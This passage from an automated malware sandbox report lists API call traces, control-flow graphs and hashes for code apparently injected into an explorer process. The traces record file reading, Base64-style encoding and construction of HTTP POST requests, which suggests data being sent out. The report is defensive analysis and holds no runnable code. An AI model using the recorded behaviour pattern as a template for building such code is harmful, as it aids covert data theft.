                                                                                                                                                                                                                • Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1
                                                                                                                                                                                                                • Part of subcall function 02F52938: lstrlen.KERNEL32(03306EB6,?,00000000,00000000,02F520E3,74DE8A60,03306EB6,00000000), ref: 02F52940
                                                                                                                                                                                                                • Part of subcall function 02F52938: MultiByteToWideChar.KERNEL32(00000000,00000000,03306EB6,00000001,00000000,00000000), ref: 02F52952
                                                                                                                                                                                                                • Part of subcall function 02F524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02F524DE
                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 02F5213F
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02F52278
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02F522E3
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02F523AD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                                                                                                              • Opcode ID: 6a849c091a73a5775e9b05adfbab9b28404bd78e7a50a6439efbc1677034a0c6
                                                                                                                                                                                                              • Instruction ID: 2cb5029c22afa2a83b3579f2e398cefc8342fdd8a15ab8c5cb51cc4f2476d0a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a849c091a73a5775e9b05adfbab9b28404bd78e7a50a6439efbc1677034a0c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EA15B71A08364AFD7109F68D884A2FBBE9EF88794F040A2DFF85D3251DB70D9048B52

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 255 2f51ece-2f51eec StrStrIA 256 2f51ef5-2f51f35 RtlMoveMemory * 2 StrStrIA 255->256 257 2f51eee-2f51ef0 255->257 259 2f51fa7 256->259 260 2f51f37-2f51f48 StrStrIA 256->260 258 2f51fab-2f51fb3 257->258 261 2f51fa9-2f51faa 259->261 260->259 262 2f51f4a-2f51f5b StrStrIA 260->262 261->258 262->259 263 2f51f5d-2f51f68 lstrlen 262->263 264 2f51fa3-2f51fa5 263->264 265 2f51f6a 263->265 264->261 266 2f51f6c-2f51f78 call 2f51ffb 265->266 269 2f51f9b-2f51fa1 lstrlen 266->269 270 2f51f7a-2f51f80 266->270 269->264 269->266 271 2f51f87-2f51f8a 270->271 272 2f51f82-2f51f85 270->272 271->269 273 2f51f8c-2f51f8f 271->273 272->269 272->271 273->269 274 2f51f91-2f51f94 273->274 274->269 275 2f51f96-2f51f99 274->275 275->259 275->269
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,02F531D8,00000000,03307258), ref: 02F51EE4
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,00000000), ref: 02F51F08
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,00000100), ref: 02F51F22
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 02F51F31
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 02F51F44
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 02F51F57
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02F51F64
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,00000000), ref: 02F51F9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryMovelstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 456560858-0
                                                                                                                                                                                                              • Opcode ID: edab0126ed5f7efad3d3902c48630a22d8109950046133999a08411fad3b35a2
                                                                                                                                                                                                              • Instruction ID: 9ea09b37f4862a14cc8d20b11eeeabf6f894edbb955c01ca563a98f7889ace10
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edab0126ed5f7efad3d3902c48630a22d8109950046133999a08411fad3b35a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1219072D043296AD730A9689CC5FEBB7DD9B463C4F010A26EF48C3101E729E54A87A2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 291 2f51e44-2f51e59 292 2f51ec8-2f51ecd 291->292 293 2f51e5b-2f51e73 lstrlen CharLowerBuffA 291->293 294 2f51e75-2f51e7b 293->294 295 2f51e9d-2f51eaa call 2f526fc 293->295 296 2f51e7f-2f51e89 lstrcmpiA 294->296 298 2f51ec7 295->298 301 2f51eac-2f51eb5 call 2f51ece 295->301 296->298 299 2f51e8b-2f51e9b 296->299 298->292 299->295 299->296 301->298 304 2f51eb7-2f5267d 301->304 306 2f5267f-2f52688 304->306 307 2f526a9-2f526ab 304->307 308 2f52692-2f526a8 lstrlen RtlMoveMemory 306->308 309 2f5268a-2f52690 306->309 308->307 309->308
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,02F51BF4), ref: 02F51E5D
                                                                                                                                                                                                              • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,02F51BF4), ref: 02F51E69
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,033081FC), ref: 02F51E81
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 02F52699
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(033081FC,?,00000000), ref: 02F526A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2826435453-0
                                                                                                                                                                                                              • Opcode ID: 7a6a79505cb684f2df8825b4d46f390d5d602814c55f5b2993cdd1f96712bc1b
                                                                                                                                                                                                              • Instruction ID: 2305f8157957db586191f50cd13b623c58387d7112e60714f1dbc1572fe55335
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a6a79505cb684f2df8825b4d46f390d5d602814c55f5b2993cdd1f96712bc1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1221AA76E003349FD7109B18EC84A7BB7DDEF856E9B10056AEF55C7240D771A8068BA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 310 2f51e3e-2f51e59 311 2f51ec8-2f51ecd 310->311 312 2f51e5b-2f51e73 lstrlen CharLowerBuffA 310->312 313 2f51e75-2f51e7b 312->313 314 2f51e9d-2f51eaa call 2f526fc 312->314 315 2f51e7f-2f51e89 lstrcmpiA 313->315 317 2f51ec7 314->317 320 2f51eac-2f51eb5 call 2f51ece 314->320 315->317 318 2f51e8b-2f51e9b 315->318 317->311 318->314 318->315 320->317 323 2f51eb7-2f5267d 320->323 325 2f5267f-2f52688 323->325 326 2f526a9-2f526ab 323->326 327 2f52692-2f526a8 lstrlen RtlMoveMemory 325->327 328 2f5268a-2f52690 325->328 327->326 328->327
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,02F51BF4), ref: 02F51E5D
                                                                                                                                                                                                              • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,02F51BF4), ref: 02F51E69
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,033081FC), ref: 02F51E81
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 02F52699
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(033081FC,?,00000000), ref: 02F526A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2826435453-0
                                                                                                                                                                                                              • Opcode ID: a429ef67a108a4c05d37dce1082a192b393af78820012fd3a43b5b3fe80c59bb
                                                                                                                                                                                                              • Instruction ID: 7d73b0d93b11422af3db49dfd17df19cee3ebf15e080f4b580bdba0fed8866b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a429ef67a108a4c05d37dce1082a192b393af78820012fd3a43b5b3fe80c59bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7721DA76E003349FD7109F28DC84A6B77DDEF8A6D8B000569EF45D7241C771A8068BA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 329 2f518f4-2f51917 CreateFileW 330 2f5196d-2f5196f 329->330 331 2f51919-2f51927 GetFileSize 329->331 332 2f51965-2f5196c CloseHandle 331->332 333 2f51929-2f5192b 331->333 332->330 333->332 334 2f5192d-2f51949 call 2f529b7 ReadFile 333->334 337 2f5195d-2f51964 call 2f52999 334->337 338 2f5194b-2f51958 call 2f51c39 call 2f51972 334->338 337->332 338->337
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02F5190C
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 02F5191C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02F51966
                                                                                                                                                                                                                • Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
                                                                                                                                                                                                                • Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02F51941
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2517252058-0
                                                                                                                                                                                                              • Opcode ID: 49b1086d2338cffc496c6c3997b00e3f850ede116292e596b3d157a80ada7945
                                                                                                                                                                                                              • Instruction ID: 9fe808c20d8f5a92d789018c61973615aa4df6c366592a2b56f69f3ac2b1477a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49b1086d2338cffc496c6c3997b00e3f850ede116292e596b3d157a80ada7945
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC01DB32B0033877D2212A399C58F6FB55DDF86AF8F010629BF5AA21D0DB2169155670

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:14.2%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:285
                                                                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                                                                              execution_graph 1311 2ca2c8a 1319 2ca2bf2 1311->1319 1313 2ca2c9b 1314 2ca2ca1 lstrlen 1313->1314 1315 2ca2cc6 1313->1315 1324 2ca2678 1314->1324 1339 2ca224c 1319->1339 1323 2ca2c09 1323->1313 1325 2ca2691 1324->1325 1330 2ca2721 1324->1330 1325->1330 1352 2ca1274 VirtualQuery 1325->1352 1328 2ca2753 1354 2ca1000 GetProcessHeap RtlAllocateHeap 1328->1354 1329 2ca279e 1334 2ca27ad 1329->1334 1355 2ca1000 GetProcessHeap RtlAllocateHeap 1329->1355 1338 2ca105d VirtualFree 1330->1338 1332 2ca2768 memcpy 1332->1330 1333 2ca26e9 1336 2ca2700 memcpy 1333->1336 1337 2ca27c7 memcpy 1334->1337 1336->1330 1337->1330 1338->1315 1350 2ca1000 GetProcessHeap RtlAllocateHeap 1339->1350 1341 2ca2254 1342 2ca23e3 1341->1342 1351 2ca104c VirtualAlloc 1342->1351 1344 2ca2633 1344->1323 1345 2ca25b5 lstrcat lstrcat lstrcat lstrcat 1347 2ca23fc 1345->1347 1346 2ca1011 GetProcessHeap RtlFreeHeap VirtualQuery 1346->1347 1347->1344 1347->1345 1347->1346 1348 2ca2346 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap VirtualQuery 1347->1348 1349 2ca231f GetProcessHeap RtlAllocateHeap memcpy 1347->1349 1348->1347 1349->1347 1350->1341 1351->1347 1353 2ca128b 1352->1353 1353->1328 1353->1329 1353->1330 1353->1333 1354->1332 1355->1337 1554 2ca2c18 1555 2ca2c2a 1554->1555 1556 2ca2c82 1555->1556 1557 2ca2bf2 11 API calls 1555->1557 1558 2ca2c45 1557->1558 1558->1556 1559 2ca1141 2 API calls 1558->1559 1560 2ca2c59 1559->1560 1561 2ca2c79 1560->1561 1562 2ca2c5d lstrlen 1560->1562 1565 2ca105d VirtualFree 1561->1565 1563 2ca2678 6 API calls 1562->1563 1563->1561 1565->1556 1356 2ca3449 RtlEnterCriticalSection 1357 2ca346e 1356->1357 1383 2ca34ce 1356->1383 1358 2ca35bc RtlLeaveCriticalSection 1357->1358 1361 2ca1274 VirtualQuery 1357->1361 1357->1383 1359 2ca1274 VirtualQuery 1360 2ca34e9 1359->1360 1360->1358 1363 2ca34fd RtlZeroMemory 1360->1363 1364 2ca35b1 1360->1364 1362 2ca3485 1361->1362 1366 2ca1274 VirtualQuery 1362->1366 1362->1383 1428 2ca2f3d 1363->1428 1364->1358 1368 2ca3494 1366->1368 1370 2ca3498 lstrcat 1368->1370 1368->1383 1369 2ca3526 StrToIntA 1369->1358 1371 2ca353b 1369->1371 1389 2ca2faa 1370->1389 1440 2ca1141 lstrlen lstrlen 1371->1440 1378 2ca3595 1380 2ca2faa 16 API calls 1378->1380 1384 2ca35aa 1380->1384 1381 2ca3574 1443 2ca104c VirtualAlloc 1381->1443 1382 2ca3558 1382->1381 1442 2ca105d VirtualFree 1382->1442 1383->1358 1383->1359 1388 2ca2f1f 22 API calls 1384->1388 1387 2ca3585 RtlMoveMemory 1387->1358 1388->1364 1390 2ca1141 2 API calls 1389->1390 1391 2ca2fbf 1390->1391 1392 2ca2fd1 1391->1392 1393 2ca1141 2 API calls 1391->1393 1396 2ca3129 1392->1396 1444 2ca1000 GetProcessHeap RtlAllocateHeap 1392->1444 1393->1392 1395 2ca2fe6 1445 2ca1000 GetProcessHeap RtlAllocateHeap 1395->1445 1424 2ca2f1f 1396->1424 1398 2ca2ff1 RtlZeroMemory 1399 2ca2f3d 3 API calls 1398->1399 1400 2ca3013 1399->1400 1401 2ca3118 1400->1401 1402 2ca301e StrToIntA 1400->1402 1404 2ca1011 3 API calls 1401->1404 1402->1401 1403 2ca3038 1402->1403 1405 2ca2f3d 3 API calls 1403->1405 1406 2ca3120 1404->1406 1407 2ca3047 1405->1407 1408 2ca1011 3 API calls 1406->1408 1407->1401 1409 2ca3051 lstrlen 1407->1409 1408->1396 1410 2ca2f3d 3 API calls 1409->1410 1411 2ca3066 1410->1411 1412 2ca1141 2 API calls 1411->1412 1413 2ca3074 1412->1413 1413->1401 1446 2ca1000 GetProcessHeap RtlAllocateHeap 1413->1446 1415 2ca308b 1416 2ca2f3d 3 API calls 1415->1416 1417 2ca30a4 wsprintfA 1416->1417 1447 2ca1000 GetProcessHeap RtlAllocateHeap 1417->1447 1419 2ca30cc 1420 2ca2f3d 3 API calls 1419->1420 1421 2ca30dd lstrcat 1420->1421 1448 2ca1011 1421->1448 1423 2ca30ee lstrcat lstrlen RtlMoveMemory 1423->1401 1425 2ca2f3c 1424->1425 1426 2ca2f23 CreateThread CloseHandle 1424->1426 1427 2ca105d VirtualFree 1425->1427 1426->1425 1453 2ca2ed2 1426->1453 1427->1383 1429 2ca2f4b 1428->1429 1430 2ca2f61 1428->1430 1432 2ca1141 2 API calls 1429->1432 1431 2ca1141 2 API calls 1430->1431 1433 2ca2f66 1431->1433 1437 2ca2f57 1432->1437 1434 2ca2fa4 1433->1434 1435 2ca1141 2 API calls 1433->1435 1434->1358 1434->1369 1435->1437 1436 2ca1141 2 API calls 1438 2ca2f8e 1436->1438 1437->1434 1437->1436 1438->1434 1439 2ca2f92 RtlMoveMemory 1438->1439 1439->1434 1441 2ca1162 1440->1441 1441->1358 1441->1378 1441->1382 1442->1381 1443->1387 1444->1395 1445->1398 1446->1415 1447->1419 1449 2ca1274 VirtualQuery 1448->1449 1450 2ca1019 1449->1450 1451 2ca102d 1450->1451 1452 2ca101d GetProcessHeap RtlFreeHeap 1450->1452 1451->1423 1452->1451 1454 2ca2edd 1453->1454 1455 2ca2f16 RtlExitUserThread 1453->1455 1465 2ca178c lstrlen 1454->1465 1458 2ca2f0e 1459 2ca1011 3 API calls 1458->1459 1459->1455 1463 2ca2f07 1464 2ca1011 3 API calls 1463->1464 1464->1458 1466 2ca17d3 1465->1466 1467 2ca17a4 CryptBinaryToStringA 1465->1467 1466->1458 1471 2ca1b1b 1466->1471 1467->1466 1468 2ca17b7 1467->1468 1483 2ca1000 GetProcessHeap RtlAllocateHeap 1468->1483 1470 2ca17c2 CryptBinaryToStringA 1470->1466 1472 2ca1b3e 1471->1472 1473 2ca1b31 lstrlen 1471->1473 1484 2ca1000 GetProcessHeap RtlAllocateHeap 1472->1484 1473->1472 1475 2ca1b46 lstrcat 1476 2ca1b7b lstrcat 1475->1476 1477 2ca1b82 1475->1477 1476->1477 1485 2ca186c 1477->1485 1480 2ca1011 3 API calls 1481 2ca1ba5 1480->1481 1482 2ca105d VirtualFree 1481->1482 1482->1463 1483->1470 1484->1475 1508 2ca1000 GetProcessHeap RtlAllocateHeap 1485->1508 1487 2ca1890 1509 2ca106c lstrlen MultiByteToWideChar 1487->1509 1489 2ca189f 1510 2ca17dc RtlZeroMemory 1489->1510 1492 2ca18f1 RtlZeroMemory 1495 2ca1926 1492->1495 1493 2ca1011 3 API calls 1494 2ca1b10 1493->1494 1494->1480 1496 2ca1af3 1495->1496 1512 2ca1000 GetProcessHeap RtlAllocateHeap 1495->1512 1496->1493 1498 2ca19e2 wsprintfW 1499 2ca1a02 1498->1499 1500 2ca1add 1499->1500 1513 2ca1000 GetProcessHeap RtlAllocateHeap 1499->1513 1501 2ca1011 3 API calls 1500->1501 1501->1496 1503 2ca1a70 1504 2ca1ad6 1503->1504 1514 2ca104c VirtualAlloc 1503->1514 1506 2ca1011 3 API calls 1504->1506 1506->1500 1507 2ca1ac6 RtlMoveMemory 1507->1504 1508->1487 1509->1489 1511 2ca17fe 1510->1511 1511->1492 1511->1496 1512->1498 1513->1503 1514->1507 1515 2ca2cce 1516 2ca2cd7 1515->1516 1517 2ca2d02 1516->1517 1518 2ca2678 6 API calls 1516->1518 1518->1517 1566 2ca285f 1567 2ca1141 2 API calls 1566->1567 1568 2ca2869 1567->1568 1569 2ca28a8 1568->1569 1570 2ca1141 2 API calls 1568->1570 1571 2ca287c 1570->1571 1571->1569 1572 2ca1141 2 API calls 1571->1572 1573 2ca2892 1572->1573 1573->1569 1574 2ca2896 RtlMoveMemory 1573->1574 1574->1569 1575 2ca2b6c 1576 2ca2b6e 1575->1576 1577 2ca2bb2 RtlExitUserThread 1576->1577 1580 2ca178c 5 API calls 1576->1580 1578 2ca2bc3 1577->1578 1579 2ca2bef 1577->1579 1594 2ca27e7 1578->1594 1581 2ca2b81 1580->1581 1582 2ca2baa 1581->1582 1585 2ca1b1b 15 API calls 1581->1585 1593 2ca105d VirtualFree 1582->1593 1587 2ca2b9c 1585->1587 1592 2ca105d VirtualFree 1587->1592 1588 2ca2bd6 CreateThread CloseHandle 1588->1579 1604 2ca2b6e 1588->1604 1590 2ca2ba3 1591 2ca1011 3 API calls 1590->1591 1591->1582 1592->1590 1593->1577 1595 2ca27ee 1594->1595 1602 2ca284d 1594->1602 1596 2ca1274 VirtualQuery 1595->1596 1595->1602 1597 2ca2818 1596->1597 1598 2ca282b 1597->1598 1599 2ca1011 3 API calls 1597->1599 1600 2ca1274 VirtualQuery 1598->1600 1599->1598 1601 2ca283a 1600->1601 1601->1602 1603 2ca1011 3 API calls 1601->1603 1602->1579 1602->1588 1603->1602 1605 2ca2b79 1604->1605 1606 2ca2bb2 RtlExitUserThread 1604->1606 1608 2ca178c 5 API calls 1605->1608 1607 2ca2bc3 1606->1607 1616 2ca2bef 1606->1616 1612 2ca27e7 3 API calls 1607->1612 1610 2ca2b81 1608->1610 1609 2ca2baa 1622 2ca105d VirtualFree 1609->1622 1610->1609 1613 2ca1b1b 15 API calls 1610->1613 1614 2ca2bd2 1612->1614 1615 2ca2b9c 1613->1615 1614->1616 1617 2ca2bd6 CreateThread CloseHandle 1614->1617 1621 2ca105d VirtualFree 1615->1621 1617->1616 1623 2ca2b6e 22 API calls 1617->1623 1619 2ca2ba3 1620 2ca1011 3 API calls 1619->1620 1620->1609 1621->1619 1622->1606 1624 2ca28ad 1625 2ca2967 1624->1625 1626 2ca28bd 1624->1626 1626->1625 1627 2ca1141 2 API calls 1626->1627 1629 2ca28de 1627->1629 1628 2ca295b lstrlen 1628->1625 1629->1625 1629->1628 1630 2ca1141 2 API calls 1629->1630 1631 2ca290f RtlMoveMemory lstrcat 1629->1631 1632 2ca2957 1629->1632 1630->1629 1633 2ca1141 2 API calls 1631->1633 1632->1628 1633->1629 1519 2ca3401 1520 2ca340a 1519->1520 1521 2ca3442 1519->1521 1522 2ca1274 VirtualQuery 1520->1522 1523 2ca3412 1522->1523 1523->1521 1524 2ca3416 RtlEnterCriticalSection 1523->1524 1529 2ca3132 1524->1529 1527 2ca2f1f 22 API calls 1528 2ca343a RtlLeaveCriticalSection 1527->1528 1528->1521 1530 2ca314d 1529->1530 1543 2ca32e8 1529->1543 1530->1543 1550 2ca1000 GetProcessHeap RtlAllocateHeap 1530->1550 1532 2ca31cd 1551 2ca1000 GetProcessHeap RtlAllocateHeap 1532->1551 1534 2ca3212 1535 2ca32d8 1534->1535 1536 2ca322c lstrlen 1534->1536 1538 2ca1011 3 API calls 1535->1538 1536->1535 1537 2ca323d 1536->1537 1539 2ca1141 2 API calls 1537->1539 1540 2ca32df 1538->1540 1542 2ca324b 1539->1542 1541 2ca1011 3 API calls 1540->1541 1541->1543 1542->1535 1552 2ca1000 GetProcessHeap RtlAllocateHeap 1542->1552 1543->1527 1545 2ca3260 1553 2ca1000 GetProcessHeap RtlAllocateHeap 1545->1553 1547 2ca327f wsprintfA lstrcat 1548 2ca1011 3 API calls 1547->1548 1549 2ca32b8 lstrcat lstrlen RtlMoveMemory 1548->1549 1549->1535 1550->1532 1551->1534 1552->1545 1553->1547 1644 2ca3371 1645 2ca337a 1644->1645 1646 2ca33b2 1644->1646 1647 2ca1274 VirtualQuery 1645->1647 1648 2ca3382 1647->1648 1648->1646 1649 2ca3386 RtlEnterCriticalSection 1648->1649 1650 2ca3132 13 API calls 1649->1650 1651 2ca33a3 1650->1651 1652 2ca2f1f 22 API calls 1651->1652 1653 2ca33aa RtlLeaveCriticalSection 1652->1653 1653->1646 1654 2ca32f4 1655 2ca3302 1654->1655 1656 2ca335f 1655->1656 1657 2ca332b RtlEnterCriticalSection 1655->1657 1658 2ca3342 1657->1658 1659 2ca334e 1657->1659 1660 2ca2faa 16 API calls 1658->1660 1662 2ca3357 RtlLeaveCriticalSection 1659->1662 1661 2ca3347 1660->1661 1663 2ca2f1f 22 API calls 1661->1663 1662->1656 1663->1659

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_02CA2CCE 77 Function_02CA2678 0->77 1 Function_02CA87CE 2 Function_02CA8CC3 3 Function_02CA16C7 4 Function_02CA14D8 8 Function_02CA13D7 4->8 20 Function_02CA13FE 4->20 85 Function_02CA1000 4->85 93 Function_02CA1011 4->93 5 Function_02CA17DC 6 Function_02CA2ED2 24 Function_02CA178C 6->24 63 Function_02CA105D 6->63 88 Function_02CA1B1B 6->88 6->93 7 Function_02CA1BD2 47 Function_02CA1CA5 7->47 9 Function_02CA35D4 9->4 73 Function_02CA1363 9->73 9->85 9->93 10 Function_02CA93D4 11 Function_02CA8EEF 12 Function_02CA23E3 44 Function_02CA23A2 12->44 53 Function_02CA104C 12->53 59 Function_02CA2346 12->59 92 Function_02CA231F 12->92 12->93 13 Function_02CA3BE1 17 Function_02CA1FE5 13->17 35 Function_02CA1090 13->35 38 Function_02CA12AA 13->38 40 Function_02CA2EA8 13->40 58 Function_02CA1141 13->58 75 Function_02CA1261 13->75 80 Function_02CA1274 13->80 13->85 87 Function_02CA1305 13->87 95 Function_02CA3829 13->95 96 Function_02CA1320 13->96 104 Function_02CA1235 13->104 14 Function_02CA27E7 14->80 14->93 15 Function_02CA98E7 16 Function_02CA1CE5 52 Function_02CA1F4E 17->52 54 Function_02CA1E4C 17->54 17->80 18 Function_02CA95E5 19 Function_02CA89F9 20->4 20->8 20->85 20->93 21 Function_02CA2BF2 21->12 55 Function_02CA224C 21->55 22 Function_02CA32F4 39 Function_02CA2FAA 22->39 91 Function_02CA2F1F 22->91 23 Function_02CA2C8A 23->21 23->63 23->77 24->85 25 Function_02CA3D8D 25->13 25->25 72 Function_02CA3862 25->72 25->80 25->85 26 Function_02CA118D 27 Function_02CA1C82 27->16 28 Function_02CA8B81 29 Function_02CA2D9A 30 Function_02CA2A9B 31 Function_02CA5198 32 Function_02CA8A9F 33 Function_02CA929C 34 Function_02CA8F93 36 Function_02CA2296 37 Function_02CA2295 39->58 39->85 39->93 99 Function_02CA2F3D 39->99 89 Function_02CA2E1B 40->89 41 Function_02CA15A9 42 Function_02CA1BAF 43 Function_02CA28AD 43->58 45 Function_02CA50A0 46 Function_02CA36A1 46->4 46->73 46->85 46->93 47->16 48 Function_02CA33B9 48->80 48->91 100 Function_02CA3132 48->100 49 Function_02CA15BE 49->41 49->49 49->85 49->93 50 Function_02CA104A 51 Function_02CA3449 51->39 51->53 51->58 51->63 51->80 51->91 51->99 55->85 56 Function_02CA2643 57 Function_02CA3840 59->36 59->85 59->93 60 Function_02CA9844 61 Function_02CA2659 62 Function_02CA285F 62->58 64 Function_02CA2A54 65 Function_02CA9955 66 Function_02CA966A 67 Function_02CA2B6E 67->14 67->24 67->63 67->67 67->88 67->93 68 Function_02CA106C 69 Function_02CA186C 69->5 69->35 69->53 69->68 69->85 69->93 70 Function_02CA2B6C 70->14 70->24 70->63 70->67 70->88 70->93 71 Function_02CA926D 72->3 72->17 72->26 72->29 72->35 72->38 72->40 72->58 72->75 72->80 82 Function_02CA1C08 72->82 72->85 72->87 72->93 72->95 72->96 72->104 98 Function_02CA133F 73->98 74 Function_02CA9763 76 Function_02CA1765 77->80 77->85 78 Function_02CA3371 78->80 78->91 78->100 79 Function_02CA8A71 81 Function_02CA2A0B 82->7 82->27 82->42 82->53 83 Function_02CA3709 83->49 83->73 83->85 83->93 84 Function_02CA8702 86 Function_02CA3401 86->80 86->91 86->100 88->69 88->85 88->93 89->85 89->93 90 Function_02CA2C18 90->21 90->58 90->63 90->77 91->6 92->85 93->80 94 Function_02CA9814 95->9 95->46 95->83 97 Function_02CA9321 99->58 100->58 100->85 100->93 101 Function_02CA5137 102 Function_02CA8A37 103 Function_02CA9337

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
